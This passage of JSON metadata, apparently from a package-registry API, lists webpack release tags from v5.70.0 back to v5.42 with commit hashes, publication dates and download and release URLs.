0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.